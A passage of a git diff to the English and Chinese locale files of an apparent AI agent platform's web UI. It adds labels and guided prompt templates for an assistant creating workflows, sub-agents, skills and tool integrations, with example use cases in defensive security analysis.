API endpoints. config.json and workflow.json triggers are migration fallbacks only and must not be written directly to imply the change is active. 
If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied, published, or started, and do not ask the user what to do with workflow.json trigger templates.",
+        "auditPrompt": "Please inspect the current workflow configuration and docs. The workflow ID is {{id}}, the workflow directory is {{dir}}, the workflow configuration guide is {{guidePath}}, the MD file is {{dir}}workflow.md, and the JSON file is {{dir}}workflow.json. The first step must be reading guide.md and using it as the configuration-detail source; if it is missing, say so clearly. Tell me what is already configured, what is missing, and the single most recommended next step. Do not modify files.",
+        "samplePrompt": "I want to validate this workflow with one realistic sample. The workflow ID is {{id}}, the workflow directory is {{dir}}, the workflow configuration guide is {{guidePath}}, the MD file is {{dir}}workflow.md, and the JSON file is {{dir}}workflow.json. The first step must be reading guide.md and using its sample-validation section as the source of validation rules. Tell me what sample format I should paste, and after I paste it, check field mapping, normalization output, and likely processing behavior. Do not modify files.",
         "canHelp": "I can help you:",
         "bullet1": "Modify node logic or execution code",
         "bullet2": "Adjust branch conditions and data flow",
         "bullet3": "Add or remove nodes",
         "bullet4": "Restructure the overall flow",
         "tipPart1": "Before making changes, check the current flow description in the left ",
-        "tipPart2": " tab. A clear overall description leads to better results.",
+        "tipPart2": " tab. Clear workflow.md intent leads to better results.",
         "retry": "Retry"
       }
     }
@@ -312,17 +455,56 @@
     },
     "rightPanel": {
       "tabOverview": "Details",
-      "tabChat": "Chat"
+      "tabChat": "Workbench",
+      "tabIntegration": "Publish"
     },
     "overview": {
-      "chatHint": "Describe your requirements in the \"Chat\" tab, workflow details will be filled automatically after generation",
+      "chatHint": "Describe your requirements in the \"Workbench\" tab, workflow details will be filled automatically after generation",
       "execDescription": "Execution Flow Description"
     },
+    "publish": {
+      "emptyTitle": "Waiting for workflow",
+      "emptyHint": "After the workflow is generated, configure API, Syslog, Kafka, Webhook, or scheduled publishing here."
+    },
     "chat": {
       "sessionTitle": "New Workflow",
       "preparing": "Preparing workflow assistant...",
       "inputPlaceholder": "Describe the workflow you want to create... (Enter to send)",
       "contextMessage": "The user wants to create a Flocks workflow, please use the workflow-builder skill to complete it.",
+      "emptyStateTitle": "No execution records yet",
+      "guidePanelTitle": "Rex Assisted Creation",
+      "guidePanelDesc": "Choose a guide or creation case. Rex will follow the workflow-builder skill to confirm scenario, inputs, outputs, node flow, and sample data before writing files.",
+      "generateEditDocPrompt": "This new task was triggered by the user clicking \"Generate Spec\". The button means: first use the workflow-builder skill to generate workflow.md, then let \"Generate Workflow\" create workflow.json from the confirmed workflow.md.\n\nPlease proceed as follows:\n1. Load and follow the workflow-builder skill first.\n2. You must use the question tool to ask whether I want a Chinese or English workflow spec; ask only one question at a time and allow custom input.\n3. If the left editor already has content, treat it as a draft. If it is empty, use the question tool to collect the business scenario, inputs, outputs, trigger mode, node flow, samples, and acceptance criteria needed to create the workflow.\n4. Use the workflow_zh.md / workflow_en.md template structure from the workflow-builder skill, but generate only one workflow.md file.\n5. Make workflow.md easy for humans to edit: explain purpose, scenarios, inputs, outputs, node flow, editable points, samples, and acceptance checks.\n6. Before writing workflow.md, show a diff and wait for my confirmation; after confirmation, write workflow.md under the new workflow directory.\n7. When finished, remind me that I can click \"Generate Workflow\" to generate workflow.json from workflow.md.\n\nCurrent left editor content:\n~~~markdown\n{{editDocContent}}\n~~~",
+      "generateWorkflowPrompt": "The user clicked the \"Generate Workflow\" button. This button means: generate the formal Flocks workflow from the current workflow.md in the left editor, with workflow.json as the core machine-executable artifact.\n\nPlease follow the workflow-builder skill:\n1. Load and follow the workflow-builder skill first.\n2. Treat the workflow.md content below as the primary source of intent; do not interpret this as a request to rewrite workflow.md.\n3. If no workflow directory exists yet, first confirm/generate a suitable workflow ID and directory from workflow.md, then write workflow.md and workflow.json. If a directory already exists, read the existing workflow.json and update the machine definition from workflow.md.\n4. The generated workflow.json must be valid JSON, and nodes plus edges must form a complete flow diagram.\n5. Before writing workflow.json, show a diff and wait for my confirmation.\n6. When finished, explain what changed in workflow.json and how I should test it.\n\nCurrent editor content of workflow.md:\n~~~markdown\n{{editDocContent}}\n~~~",
+      "guideSectionTitle": "Creation Guides",
+      "caseSectionTitle": "Creation Cases",
+      "guideActions": [
+        {
+          "label": "How to Create",
+          "description": "Start from business goal, inputs, outputs, node flow, sample data, and generation steps.",
+          "prompt": "Please follow the workflow-builder skill to guide me through creating a Flocks workflow from scratch. Do not write files yet. Use the question tool to ask only the single most important question at a time and help me clarify the business scenario, trigger mode, inputs, outputs, required tools/APIs, node steps, branch conditions, sample data, and acceptance criteria. After I confirm, you must generate and write workflow.md first, let me confirm it in the left editor or diff, then generate the complete workflow.json from the confirmed workflow.md and proceed to testing."
+        },
+        {
+          "label": "Requirement Brief",
+          "description": "Turn a fuzzy idea into a structured requirement suitable for workflow.md generation.",
+          "prompt": "Please help me clarify the workflow functional requirements so they can be used to generate workflow.md and workflow.json. Use the question tool to ask one question at a time and collect: what problem the workflow solves, input format, output format, user, automatic/manual trigger, required tools or services, exceptions and edge cases, and how success should be validated."
+        },
+        {
+          "label": "Design Node Flow",
+          "description": "Break the requirement into nodes, edges, branches, loops, and a sample-data checklist.",
+          "prompt": "Please use the workflow-builder skill to help me design the workflow node flow. First confirm the business goal plus inputs and outputs, then provide reasoning dimensions, node list, edge relationships, branch/loop logic, exception handling, and a Mermaid flow diagram. Do not write workflow.json until I confirm."
+        },
+        {
+          "label": "Edit Nodes",
+          "description": "For an existing draft or generated workflow, adjust node responsibility, IO, code, or connections.",
+          "prompt": "Please help me edit workflow nodes. First read the current workflow.md draft on the left and any existing workflow.json if available, then use the question tool to confirm which node I want to change, the goal, input/output changes, whether upstream/downstream edges are affected, and sample-data impact. Show a plan and diff before modifying files."
+        },
+        {
+          "label": "Prepare Sample",
+          "description": "Generate or validate one representative sample input for later node-by-node testing.",
+          "prompt": "Please follow the workflow-builder skill to help me prepare workflow sample input. First confirm the accepted data format and key fields. If I do not have a sample, construct a minimal valid JSON sample and use the question tool to ask me to confirm it. After confirmation, use it for later node tests and integration tests."
+        }
+      ],
       "welcomeMessage": "Hello! I'm your Workflow Creation Assistant 🚀\n\nPlease describe the workflow you'd like to create, for example:\n\n- **Threat Intelligence**: IP / Domain / File Hash lookups\n- **Data Processing**: Multi-source collection, cleaning, correlation\n- **Automated Response**: Security alert handling, incident response\n\nThe more detail you provide, the more accurate the generated workflow will be. You can also click the example questions below to get started quickly!",
       "exampleQuestions": [
         "Create an IP threat intelligence query workflow that takes an IP address, queries multiple intelligence sources, and generates a summary report",
@@ -330,6 +512,13 @@
         "Design a file hash detection workflow that cross-validates hash values across multiple threat intelligence platforms",
         "Build a phishing site detection workflow that analyzes URL features, page content, and SSL certificate information",
         "Create a security incident response workflow that automatically collects, correlates, and analyzes security alerts to generate remediation recommendations"
+      ],
+      "exampleQuestionLabels": [
+        "Create IP Intel Workflow",
+        "Create Domain Analysis Workflow",
+        "Create File Hash Workflow",
+        "Create Phishing Detection Workflow",
+        "Create Incident Response Workflow"
       ]
     }
   },
diff --git a/webui/src/locales/zh-CN/agent.json b/webui/src/locales/zh-CN/agent.json
index 121c8c96e..3d288a3e9 100644
--- a/webui/src/locales/zh-CN/agent.json
+++ b/webui/src/locales/zh-CN/agent.json
@@ -78,6 +78,133 @@
   "sheet": {
     "done": "完成"
   },
+  "create": {
+    "emptyStateTitle": "暂无创建对话",
+    "guidePanelTitle": "Rex 辅助创建",
+    "guidePanelDesc": "选择一个引导或案例，Rex 会先加载 agent-builder skill，确认名称、职责、能力边界和执行模式后再生成文件。",
+    "guideSectionTitle": "创建引导",
+    "caseSectionTitle": "创建案例",
+    "guideActions": [
+      {
+        "label": "如何创建子 Agent",
+        "description": "从名称、职责、边界、策略和工具白名单开始梳理。",
+        "prompt": "请按 .flocks/plugins/skills/agent-builder skill 引导我创建一个 Flocks 子 Agent。先不要写文件，先用 question 工具一次只问一个最关键问题，帮我明确 Agent 名称、职责描述、能力边界、执行策略、工具白名单、输出格式和不适用场景；我确认后再生成 ~/.flocks/plugins/agents/<name>/agent.yaml 和 prompt.md，并在写入前展示计划。"
+      },
+      {
+        "label": "梳理职责边界",
+        "description": "把模糊需求整理成可委派的 Agent 描述和触发条件。",
+        "prompt": "请帮我把子 Agent 的职责边界梳理清楚。目标是形成 agent-builder skill 可使用的创建说明。请一次只问一个问题，依次确认：它解决什么任务、何时由 Rex 委派、不能做什么、需要哪些工具、是否只读、输出格式和验收方式。"
+      },
+      {
+        "label": "选择执行策略",
+        "description": "在 read_only、react、plan_and_execute、explore 之间做选择。",
+        "prompt": "请根据 agent-builder skill 帮我选择子 Agent 的执行策略。请先确认任务风险、是否需要写文件、是否需要执行命令、是否需要探索代码库或联网查询，然后推荐 read_only、react、plan_and_execute 或 explore，并说明对应工具白名单。"
+      },
+      {
+        "label": "设计 Prompt",
+        "description": "生成可复用的 system prompt 结构、输出格式和约束。",
+        "prompt": "请帮我设计子 Agent 的 prompt.md。先确认角色、任务目标、能力清单、输出格式、约束和示例调用场景；在我确认前不要写文件。确认后按 agent-builder skill 的模板生成 prompt.md 草稿。"
+      }
+    ],
+    "caseActions": [
+      {
+        "label": "威胁情报分析 Agent",
+        "description": "查询 IOC 信誉、关联上下文并输出研判报告。",
+        "prompt": "我想创建一个威胁情报分析子 Agent，用于分析 IP、域名、URL、哈希等 IOC，能调用项目里已有的情报工具并输出结构化研判报告。请按 agent-builder skill 引导我确认名称、工具白名单、只读边界、输出格式和适用场景。"
+      },
+      {
+        "label": "代码审计 Agent",
+        "description": "只读检查代码风险、回归风险和缺失测试。",
+        "prompt": "我想创建一个代码审计子 Agent，用于只读检查代码变更中的 bug、回归风险、安全风险和测试缺口。请按 agent-builder skill 引导我确认职责、read_only 策略、工具白名单和输出格式。"
+      },
+      {
+        "label": "日志分析 Agent",
+        "description": "分析安全日志，提取关键事件、异常模式和处置建议。",
+        "prompt": "我想创建一个日志分析子 Agent，用于读取安全日志、识别异常模式、汇总关键事件并给出处置建议。请按 agent-builder skill 引导我确认输入格式、工具权限、分析步骤和最终输出结构。"
+      }
+    ]
+  },
+  "edit": {
+    "emptyStateTitle": "暂无编辑对话",
+    "guidePanelTitle": "Rex 辅助修改",
+    "guidePanelDesc": "选择一个编辑入口，Rex 会基于当前 Agent 配置，引导你调整 Prompt、职责边界、工具权限和参数。",
+    "nativeGuidePanelDesc": "这是内置 Agent，只支持保存模型和温度；Rex 会围绕模型选择、温度策略和验证方式引导修改。",
+    "guideSectionTitle": "编辑引导",
+    "caseSectionTitle": "编辑案例",
+    "guideActions": [
+      {
+        "label": "优化当前 Agent",
+        "description": "先审视当前配置，再确认要解决的问题和修改边界。",
+        "prompt": "请帮我编辑当前 Agent「{{name}}」。请先基于当前配置做一个简短诊断，不要直接改文件；再用 question 工具一次只问一个最关键问题，帮我确认要优化的职责、Prompt、工具权限、输出格式和验收方式。确认后输出可提取到表单的 JSON 配置摘要。"
+      },
+      {
+        "label": "调整职责边界",
+        "description": "明确它应该做什么、何时被委派、哪些事情不该做。",
+        "prompt": "请帮我重新梳理当前 Agent「{{name}}」的职责边界。请对照现有描述和 System Prompt，先指出可能过宽、过窄或不清晰的地方，再逐步确认：适用场景、触发条件、不可做事项、必要工具和输出结构。"
+      },
+      {
+        "label": "收敛工具权限",
+        "description": "检查 Tools / Skills 是否过多，按最小权限重新选择。",
+        "prompt": "请帮我检查当前 Agent「{{name}}」的 Tools 和 Skills 配置。目标是最小权限：先说明每个能力是否与职责相关，再建议保留、移除或新增哪些工具/Skill，并给出理由。确认前不要输出最终配置。"
+      },
+      {
+        "label": "改写 Prompt",
+        "description": "优化角色、约束、步骤、输出格式和失败处理。",
+        "prompt": "请帮我改写当前 Agent「{{name}}」的 System Prompt。请先指出现有 Prompt 中角色、任务步骤、边界、输出格式、错误处理和示例调用是否清晰，再给出修改方案；我确认后再输出完整 Prompt 和 JSON 配置摘要。"
+      },
+      {
+        "label": "验证效果",
+        "description": "设计测试输入、预期输出和失败判据，指导保存后验证。",
+        "prompt": "请帮我验证当前 Agent「{{name}}」的配置效果。请先基于它的职责设计 2-3 个测试输入，分别说明预期输出、通过标准和失败判据；如果发现 Prompt 或工具权限可能影响测试结果，请给出需要调整的字段。确认后把建议整理成可提取到表单的配置修改。"
+      }
+    ],
+    "nativeGuideActions": [
+      {
+        "label": "检查模型策略",
+        "description": "判断当前模型是否适合这个内置 Agent 的任务特点。",
+        "prompt": "请帮我检查内置 Agent「{{name}}」的模型配置。注意：这是内置 Agent，只能保存模型和温度，不要建议修改 Prompt、Tools 或 Skills。请先说明当前任务对模型能力的要求，再给出是否建议切换模型，以及需要的 providerID 和 modelID。"
+      },
+      {
+        "label": "调整温度",
+        "description": "根据稳定性、创造性和安全性选择温度。",
+        "prompt": "请帮我调整内置 Agent「{{name}}」的温度。注意：这是内置 Agent，只能保存模型和温度。请先根据它的职责说明温度高低的影响，再给出一个推荐 temperature 数值和理由，并整理成可提取的 JSON。"
+      },
+      {
+        "label": "验证效果",
+        "description": "设计测试输入、预期输出和失败判据，指导保存后验证。",
+        "prompt": "请帮我验证内置 Agent「{{name}}」的模型和温度效果。请设计 2-3 个测试输入，说明预期输出、通过标准和失败判据；如果发现问题，只建议调整模型或温度，并整理成可提取的 JSON。"
+      }
+    ],
+    "caseActions": [
+      {
+        "label": "变得更保守",
+        "description": "降低幻觉和越权风险，适合安全分析、审计等场景。",
+        "prompt": "我想让当前 Agent「{{name}}」更保守可靠。请帮我调整 Prompt、温度建议和权限边界，让它在信息不足时先追问或说明不确定性，不要猜测；同时保持输出清晰可验证。"
+      },
+      {
+        "label": "更适合委派",
+        "description": "让主 Agent 更容易判断何时调用它、如何消费结果。",
+        "prompt": "我想让当前 Agent「{{name}}」更适合作为子 Agent 被主 Agent 委派。请优化英文描述、职责触发条件、输入要求和输出格式，并检查工具白名单是否匹配。"
+      },
+      {
+        "label": "补充输出格式",
+        "description": "把结果格式固定下来，便于主 Agent 或工作流继续处理。",
+        "prompt": "请帮我为当前 Agent「{{name}}」补充稳定的输出格式。请先确认主要使用场景，然后设计字段、层级、简短示例和异常情况下的返回方式；我确认后再整理成 Prompt 修改。"
+      }
+    ],
+    "nativeCaseActions": [
+      {
+        "label": "变得更保守",
+        "description": "降低随机性，让安全分析、审计类任务更稳定。",
+        "prompt": "我想让内置 Agent「{{name}}」更保守可靠。请只围绕模型和温度给出建议，不要修改 Prompt、Tools 或 Skills；重点说明推荐 temperature、适用模型能力和保存后的验证方法。"
+      },
+      {
+        "label": "提升响应效率",
+        "description": "在不改内置配置的前提下选择更合适的模型和温度。",
+        "prompt": "我想让内置 Agent「{{name}}」响应更快、更稳定。请只评估模型和温度配置，说明是否建议切换到更轻量的模型、温度如何设置，以及如何用测试输入验证效果。"
+      }
+    ]
+  },
   "chat": {
     "createTitle": "创建子 Agent",
     "subtitle": "通过对话描述需求，AI 自动生成配置",
diff --git a/webui/src/locales/zh-CN/common.json b/webui/src/locales/zh-CN/common.json
index ce5f6374f..7f7b5913a 100644
--- a/webui/src/locales/zh-CN/common.json
+++ b/webui/src/locales/zh-CN/common.json
@@ -113,7 +113,7 @@
     "defaultCreate": "创建",
     "defaultSave": "保存",
     "tabDetails": "详情",
-    "tabAIEdit": "AI 编辑",
+    "tabAIEdit": "工作台",
     "tabTest": "测试",
     "rexThinking": "Agent 正在思考中...",
     "editAndSend": "编辑下方内容，发送给 Agent 查看效果",
@@ -127,7 +127,10 @@
     "cancelButton": "取消",
     "extracting": "提取中...",
     "extractFromRex": "从 Rex 提取配置",
+    "extractFromRexGuideDesc": "将 Rex 输出的配置摘要提取到表单。",
     "switchToForm": "切换到表单",
+    "guideCollapse": "收起创建引导",
+    "guideExpand": "展开创建引导",
     "testStartFailed": "测试启动失败",
     "extractFailed": "提取失败，请重试",
     "rexAssist": "Rex 协助",
@@ -145,6 +148,7 @@
     "yes": "✓ 是",
     "no": "✗ 否",
     "needsAnswer": "需要你的回答",
+    "customAnswer": "自定义 / 补充说明",
     "confirm": "确认",
     "skip": "跳过"
   },
diff --git a/webui/src/locales/zh-CN/nav.json b/webui/src/locales/zh-CN/nav.json
index da698432b..d5759ed70 100644
--- a/webui/src/locales/zh-CN/nav.json
+++ b/webui/src/locales/zh-CN/nav.json
@@ -23,6 +23,8 @@
   "expandNav": "展开导航",
   "collapseNav": "收起导航",
   "switchLanguage": "切换语言",
+  "switchToDarkTheme": "切换到深色模式",
+  "switchToLightTheme": "切换到浅色模式",
   "newVersion": "新版本",
   "hasNewVersion": "有新版本 {{version}}",
   "versionInfo": "Flocks 版本信息",
diff --git a/webui/src/locales/zh-CN/session.json b/webui/src/locales/zh-CN/session.json
index 0282fe9da..b3ca27038 100644
--- a/webui/src/locales/zh-CN/session.json
+++ b/webui/src/locales/zh-CN/session.json
@@ -85,6 +85,34 @@
     "stopTitle": "停止执行",
     "contextUsageTitle": "上下文已用：{{used}} / {{total}}（{{percent}}%）",
     "contextUsageUnknown": "上下文使用量未知",
+    "contextUsage": {
+      "title": "上下文使用量",
+      "close": "关闭",
+      "full": "{{percent}}% 已用",
+      "tokens": "~{{used}} / {{total}} Tokens",
+      "excludedTokens": "已排除 {{tokens}}",
+      "noAttributedSegments": "暂无可归因明细",
+      "breakdown": {
+        "systemPrompt": "系统提示词",
+        "toolDefinitions": "工具定义",
+        "tools": "工具调用",
+        "skillLoad": "技能加载",
+        "agentDelegation": "智能体委派",
+        "conversation": "会话内容",
+        "reasoning": "思考过程",
+        "draft": "当前草稿",
+        "compactedHistory": "已压缩历史"
+      }
+    },
+    "goal": {
+      "dismiss": "关闭目标提示",
+      "status": {
+        "active": "目标",
+        "completed": "已完成",
+        "blocked": "已阻塞",
+        "paused": "已暂停"
+      }
+    },
     "edit": "编辑",
     "editRawHint": "当前显示的是原始未渲染内容，保存后会直接更新这条消息文本。",
     "editRawTitle": "编辑原始内容",
@@ -96,6 +124,11 @@
     "regenerate": "重新生成",
     "thinking": "思考中...",
     "streaming": "继续输出中...",
+    "process": {
+      "title": "过程（{{count}} 项）",
+      "reasoningCount": "{{count}} 段思考",
+      "toolCount": "{{count}} 次工具调用"
+    },
     "you": "你",
     "sending": "发送中...",
     "contextCompressed": "上下文已压缩",
@@ -160,10 +193,24 @@
       "inputParams": "输入参数",
       "outputResult": "输出结果",
       "todoStages": "Todo 阶段",
+      "todoStatus": {
+        "pending": "待办",
+        "inProgress": "进行中",
+        "completed": "已完成",
+        "cancelled": "已取消"
+      },
+      "todoSummary": {
+        "progress": "进度",
+        "inProgress": "进行中",
+        "completed": "完成",
+        "done": "完成"
+      },
       "errorLabel": "错误",
       "elapsed": "耗时",
       "workflowStage": "当前阶段：{{phase}}",
       "workflowNode": "节点：{{node}}",
+      "workflowLoopIteration": "循环",
+      "workflowLoopCurrent": "当前",
       "workflowStep": "步骤：{{step}}",
       "workflowPhase": {
         "queued": "排队中",
diff --git a/webui/src/locales/zh-CN/skill.json b/webui/src/locales/zh-CN/skill.json
index 3e9496135..681d6e9f6 100644
--- a/webui/src/locales/zh-CN/skill.json
+++ b/webui/src/locales/zh-CN/skill.json
@@ -78,6 +78,47 @@
     "missingDepsWarning": "技能已安装，但缺少以下依赖：{{missing}}",
     "runInstallDeps": "运行 \"安装依赖\" 以完成配置"
   },
+  "create": {
+    "emptyStateTitle": "暂无创建对话",
+    "guidePanelTitle": "Rex 辅助创建",
+    "guidePanelDesc": "选择一个引导或案例，Rex 会先加载 skill-builder skill，确认技能目标、触发场景、产物结构和验证方式后再生成文件。",
+    "guideSectionTitle": "创建引导",
+    "caseSectionTitle": "创建案例",
+    "guideActions": [
+      {
+        "label": "如何创建技能",
+        "description": "从用途、触发条件、说明结构、依赖和验证方式开始。",
+        "prompt": "请按 .flocks/plugins/skills/skill-builder skill 引导我创建一个 Flocks Skill。先不要写文件，先用 question 工具一次只问一个最关键问题，帮我明确技能名称、用途描述、何时触发、需要哪些 references/scripts、是否需要依赖、输出目录和验证方式；我确认后再生成 ~/.flocks/plugins/skills/<skill-name>/SKILL.md 及必要文件。"
+      },
+      {
+        "label": "梳理技能说明",
+        "description": "把模糊能力整理成可被 Agent 正确使用的 SKILL.md。",
+        "prompt": "请帮我把技能说明梳理成适合 SKILL.md 的结构。请一次只问一个问题，确认：技能解决什么问题、触发关键词、适用和不适用场景、执行步骤、需要读取的参考资料、可复用脚本、质量检查和示例。"
+      },
+      {
+        "label": "补充依赖与验证",
+        "description": "规划 bin/env/install specs、冒烟测试和失败处理。",
+        "prompt": "请按 skill-builder skill 帮我设计这个 Skill 的依赖声明和验证方式。请先确认是否需要命令行工具、Python/Node 包、环境变量或外部服务，然后给出 install specs、检查命令、冒烟测试和失败时给用户的提示。"
+      }
+    ],
+    "caseActions": [
+      {
+        "label": "安全分析技能",
+        "description": "把威胁分析步骤、报告格式和限制条件沉淀成 Skill。",
+        "prompt": "我想创建一个安全分析 Skill，用于指导 Agent 分析告警或 IOC，输出结构化研判报告。请按 skill-builder skill 引导我确认触发条件、分析流程、报告字段、参考资料和验证方式。"
+      },
+      {
+        "label": "代码迁移技能",
+        "description": "沉淀跨文件迁移、测试和回滚注意事项。",
+        "prompt": "我想创建一个代码迁移 Skill，用于指导 Agent 做框架升级或跨文件迁移。请按 skill-builder skill 引导我确认适用场景、迁移步骤、风险检查、测试命令和输出格式。"
+      },
+      {
+        "label": "外部系统使用技能",
+        "description": "记录某个系统的使用流程、禁止事项和工具调用约束。",
+        "prompt": "我想创建一个外部系统使用 Skill，用于指导 Agent 操作某个业务系统。请按 skill-builder skill 引导我确认系统名称、登录/查询流程、可用工具、禁止绕过事项、敏感信息处理和验收方式。"
+      }
+    ]
+  },
   "sheet": {
     "entityType": "技能",
     "path": "路径",
diff --git a/webui/src/locales/zh-CN/tool.json b/webui/src/locales/zh-CN/tool.json
index 416ca5495..7e21b2d42 100644
--- a/webui/src/locales/zh-CN/tool.json
+++ b/webui/src/locales/zh-CN/tool.json
@@ -92,6 +92,132 @@
     "testDetail": "测试 / 详情"
   },
 
+  "create": {
+    "mcp": {
+      "emptyStateTitle": "暂无接入对话",
+      "guidePanelTitle": "Rex 辅助接入",
+      "guidePanelDesc": "选择一个引导或案例，Rex 会先确认服务类型、连接方式、凭证和启动命令，再帮你生成可测试的 MCP 配置。",
+      "guideSectionTitle": "接入引导",
+      "caseSectionTitle": "接入案例",
+      "guideActions": [
+        {
+          "label": "如何接入 MCP",
+          "description": "从服务名称、stdio/SSE、命令参数、认证方式和连通性测试开始。",
+          "prompt": "请引导我接入一个 MCP 服务。先不要写配置，先用 question 工具一次只问一个最关键问题，帮我确认服务名称、连接方式（stdio 或远程 HTTP/SSE）、启动命令或 URL、认证方式、凭证保存方式、需要暴露的工具和连通性测试步骤；我确认后再生成配置并测试。"
+        },
+        {
+          "label": "本地 stdio 服务",
+          "description": "适合 npx、uvx、python 等本地进程型 MCP Server。",
+          "prompt": "请帮我接入本地 stdio MCP 服务。请先确认服务名称、启动命令、每个命令参数、需要的环境变量或 secret、工作目录和测试方式；确认前不要写配置。"
+        },
+        {
+          "label": "远程 SSE/HTTP 服务",
+          "description": "适合已经部署的远程 MCP 服务，重点确认 URL、传输协议和认证。",
+          "prompt": "请帮我接入远程 MCP 服务。请先确认服务 URL、传输协议（自动/SSE/Streamable HTTP）、认证方式、请求头或 token、是否需要 secret 管理和健康检查方式；确认前不要写配置。"
+        }
+      ],
+      "caseActions": [
+        {
+          "label": "GitHub MCP",
+          "description": "接入 GitHub 仓库、Issue、PR 等工具能力。",
+          "prompt": "我想接入 GitHub MCP 服务，用于仓库、Issue 和 PR 操作。请引导我确认服务名称、启动命令、GITHUB_TOKEN 的 secret 保存方式、权限范围和测试步骤。"
+        },
+        {
+          "label": "Filesystem MCP",
+          "description": "接入一个受限目录的文件读取或管理能力。",
+          "prompt": "我想接入 Filesystem MCP 服务，只允许访问指定目录。请引导我确认目录范围、读写权限、启动参数、安全限制和测试步骤。"
+        },
+        {
+          "label": "远程业务 MCP",
+          "description": "接入企业内部已经部署好的远程 MCP 服务。",
+          "prompt": "我想接入一个企业内部远程 MCP 服务。请引导我确认 URL、认证方式、凭证管理、网络可达性、工具列表检查和上线前验证步骤。"
+        }
+      ]
+    },
+    "api": {
+      "emptyStateTitle": "暂无接入对话",
+      "guidePanelTitle": "Rex 辅助接入",
+      "guidePanelDesc": "选择一个引导或案例，Rex 会加载 tool-builder skill，确认 API 文档、认证和输出格式后生成 YAML 工具。",
+      "guideSectionTitle": "接入引导",
+      "caseSectionTitle": "接入案例",
+      "guideActions": [
+        {
+          "label": "如何接入 API",
+          "description": "从 Base URL、认证、接口列表、输入输出和测试样例开始。",
+          "prompt": "请按 .flocks/plugins/skills/tool-builder skill 引导我接入一个外部 API 作为 Flocks 工具。先不要写文件，先用 question 工具一次只问一个最关键问题，确认 API 名称、Base URL、认证方式、核心接口、输入参数、输出字段、错误处理、secret 保存和冒烟测试；我确认后再生成 ~/.flocks/plugins/tools/api/ 下的 YAML 工具。"
+        },
+        {
+          "label": "整理 API 文档",
+          "description": "把文档、示例请求和响应转换为工具定义草稿。",
+          "prompt": "请帮我整理 API 文档并形成工具创建说明。请先询问文档链接或文档内容，然后提取接口路径、方法、认证、请求参数、响应字段、分页/限流、错误码和测试样例；在我确认前不要写文件。"
+        },
+        {
+          "label": "设计鉴权与 Secret",
+          "description": "确认 API Key、Bearer、Header、Query 等凭证保存方式。",
+          "prompt": "请帮我设计 API 工具的鉴权和 secret 管理。请先确认认证类型、密钥名称、是否支持 {secret:...}、是否需要默认环境变量、失败提示和测试方式；不要在代码或配置里硬编码真实凭证。"
+        }
+      ],
+      "caseActions": [
+        {
+          "label": "威胁情报 API",
+          "description": "接入 IOC 查询、信誉评分或情报摘要接口。",
+          "prompt": "我想接入一个威胁情报 API，用于查询 IP、域名、URL 或哈希信誉。请按 tool-builder skill 引导我确认接口文档、认证方式、输入输出字段、错误处理和冒烟测试。"
+        },
+        {
+          "label": "告警平台 API",
+          "description": "接入告警查询、详情拉取或状态更新接口。",
+          "prompt": "我想接入一个告警平台 API，用于查询告警列表、拉取详情或更新处置状态。请按 tool-builder skill 引导我确认接口范围、分页、认证、输出结构和测试数据。"
+        },
+        {
+          "label": "资产查询 API",
+          "description": "接入资产、主机、漏洞或标签查询接口。",
+          "prompt": "我想接入一个资产查询 API，用于按 IP、主机名或标签查询资产信息。请按 tool-builder skill 引导我确认 API 文档、参数、响应字段、secret 管理和验证方式。"
+        }
+      ]
+    },
+    "local": {
+      "emptyStateTitle": "暂无创建对话",
+      "guidePanelTitle": "Rex 辅助创建",
+      "guidePanelDesc": "选择一个引导或案例，Rex 会加载 tool-builder skill，确认工具输入输出、实现方式和冒烟测试后生成本地 Python 工具。",
+      "guideSectionTitle": "创建引导",
+      "caseSectionTitle": "创建案例",
+      "guideActions": [
+        {
+          "label": "如何创建本地工具",
+          "description": "从工具名、参数 schema、返回格式、权限和测试样例开始。",
+          "prompt": "请按 .flocks/plugins/skills/tool-builder skill 引导我创建一个 Flocks 本地 Python 工具。先不要写文件，先用 question 工具一次只问一个最关键问题，确认工具名称、功能、输入参数 schema、返回格式、是否需要文件/命令/网络访问、错误处理和冒烟测试；我确认后再生成 ~/.flocks/plugins/tools/python/ 下的工具文件。"
+        },
+        {
+          "label": "设计输入输出",
+          "description": "把自然语言需求转换成明确参数、类型和返回 JSON。",
+          "prompt": "请帮我设计本地工具的输入输出。请先确认使用者、输入字段、字段类型、必填项、默认值、返回 JSON 结构、错误对象和一条最小测试样例；确认前不要写文件。"
+        },
+        {
+          "label": "规划测试样例",
+          "description": "生成最小可用样例、边界样例和失败样例。",
+          "prompt": "请按 tool-builder skill 帮我规划本地工具的测试样例。请先确认正常输入、边界输入、错误输入、预期输出和执行方式；写文件前先给出测试计划。"
+        }
+      ],
+      "caseActions": [
+        {
+          "label": "文本解析工具",
+          "description": "从日志、告警文本或报告中提取结构化字段。",
+          "prompt": "我想创建一个文本解析本地工具，用于从日志、告警文本或报告中提取结构化字段。请按 tool-builder skill 引导我确认输入格式、字段 schema、解析规则和测试样例。"
+        },
+        {
+          "label": "JSON 转换工具",
+          "description": "清洗、重命名或合并 JSON 字段。",
+          "prompt": "我想创建一个 JSON 转换本地工具，用于清洗、重命名、合并或规范化 JSON 字段。请按 tool-builder skill 引导我确认输入输出 schema、转换规则和测试样例。"
+        },
+        {
+          "label": "报告生成工具",
+          "description": "把结构化数据生成 Markdown 或摘要报告。",
+          "prompt": "我想创建一个报告生成本地工具，用于把结构化分析结果转换成 Markdown 摘要报告。请按 tool-builder skill 引导我确认输入字段、报告模板、输出格式和冒烟测试。"
+        }
+      ]
+    }
+  },
+
   "addMCP": {
     "title": "添加 MCP 服务",
     "subtitle": "通过表单或对话配置并添加 MCP 服务",
@@ -494,9 +620,9 @@
     "toolCountLabel": "工具数",
     "resourceCountLabel": "资源数",
     "generateIntro": "通过 AI 对话生成工具",
-    "generateDesc": "切换到「AI 编辑」标签页，描述你需要的工具，Rex 将自动生成 Python 工具代码并完成接入。",
+    "generateDesc": "切换到「工作台」标签页，描述你需要的工具，Rex 将自动生成 Python 工具代码并完成接入。",
     "doneLabel": "完成",
-    "mcpHintDesc": "不确定怎么填？切换到「AI 编辑」标签页，告诉 Rex 你想接入什么 MCP 服务，它会帮你自动完成配置。",
+    "mcpHintDesc": "不确定怎么填？切换到「工作台」标签页，告诉 Rex 你想接入什么 MCP 服务，它会帮你自动完成配置。",
     "connSuccess": "连接成功",
     "connFailed": "连接失败",
     "addFailedTitle": "添加失败"
diff --git a/webui/src/locales/zh-CN/update.json b/webui/src/locales/zh-CN/update.json
index cbd343a19..8ebca06ca 100644
--- a/webui/src/locales/zh-CN/update.json
